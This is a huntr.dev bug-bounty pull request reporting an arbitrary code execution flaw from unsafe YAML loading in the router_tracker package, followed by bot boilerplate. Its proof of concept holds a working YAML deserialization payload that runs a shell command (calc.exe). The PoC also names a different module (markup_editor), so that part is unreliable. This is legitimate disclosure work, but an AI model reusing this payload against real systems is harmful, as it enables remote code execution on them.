Fixed Arbitary Code Execution

[Anon-Artist]

📊 Metadata *

router_tracker package is vulnerable to Arbitrary Code Execution.

Bounty URL: https://www.huntr.dev/bounties/1-other-router_tracker

⚙️ Description *

Vulnerable to YAML deserialization attack caused by unsafe loading.

💻 Technical Description *

Fixed by avoiding unsafe loader.

🐛 Proof of Concept (PoC) *

Create the following PoC file:
exploit.py

import markup_editor

payload = """cmd: !!python/object/new:type
  args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
  listitems: "__import__('os').system('calc.exe')"
"""

open('malicious.yaml','w+').write(payload)
markup_editor.load_yaml("malicious.yaml")

Execute the commands in another terminal:

python3 exploit.py

xcalc will pop up.

🔥 Proof of Fix (PoF) *

After fix Arbitary Code execution will never happen.

👍 User Acceptance Testing (UAT)

After fix functionality is unaffected.

🔗 Relates to...

https://www.huntr.dev/bounties/1-other-router_tracker

[huntr-helper]

👋 Hello, @jhuntwv - @Anon-Artist has opened a PR to us with a fix for a potential vulnerability in your repository. To view the vulnerability, please refer to the bounty URL in the first comment, above.

Ultimately, you get to decide if the fix is 👍 or 👎. If you are happy with the fix, please write a new comment (@huntr-helper - LGTM) and we will open a PR to your repository with the fix. All remaining PRs for this vulnerability will be automatically closed.

If you have any questions or need support, come and join us on our community Discord!

@jhuntwv & @Anon-Artist - thank you for your efforts in securing the world’s open source code! 🎉

---

🔨 Want more security researchers protecting your repository?

Stick our badge on your README.md, and let security researchers know that they can win bounties protecting your repositories. Sounds cool, huh? 😎

Copy this small code snippet and insert it into your README.md:

[![huntr](https://cdn.huntr.dev/huntr_security_badge.svg)](https://huntr.dev)

👇 👇 👇